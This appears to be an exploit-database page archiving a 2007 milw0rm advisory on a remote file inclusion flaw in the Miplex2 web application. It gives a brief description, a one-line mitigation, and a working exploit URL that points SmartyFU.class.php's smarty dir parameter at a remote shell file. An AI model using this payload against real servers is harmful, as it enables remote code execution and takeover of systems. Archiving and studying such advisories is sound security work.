header-logo
Suggest Exploit
vendor:
Miplex2
by:
ThE TiGeR
N/A
CVSS
MEDIUM
This exploit allows an attacker to include arbitrary files from a remote server in the affected system’s web application.
CWE
Product Name: Miplex2
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Miplex2 Remote file inclusion

This exploit allows an attacker to include arbitrary files from a remote server in the affected system's web application.

Mitigation:

Implement proper input validation and sanitization checks to prevent remote file inclusion vulnerabilities.
Source

Exploit-DB raw data:

#Miplex2 Remote file inclusion

#Download script : http://download.berlios.de/miplex2/miplex2alpha.tar.gz

#Thanks Str0ke

#Exploit :

#http://victim.com/[miplex2_paht]/lib/smarty/SmartyFU.class.php?system[smarty][dir]=shell.txt?

#Discovered by : ThE TiGeR

#Greetz : Reda, â„¢~${{BraveHeart}}$~â„¢

#Miro_Tiger[at]Hotmail[dot]com

# milw0rm.com [2007-05-08]

Navigation

Suggest Exploit

Services By CQR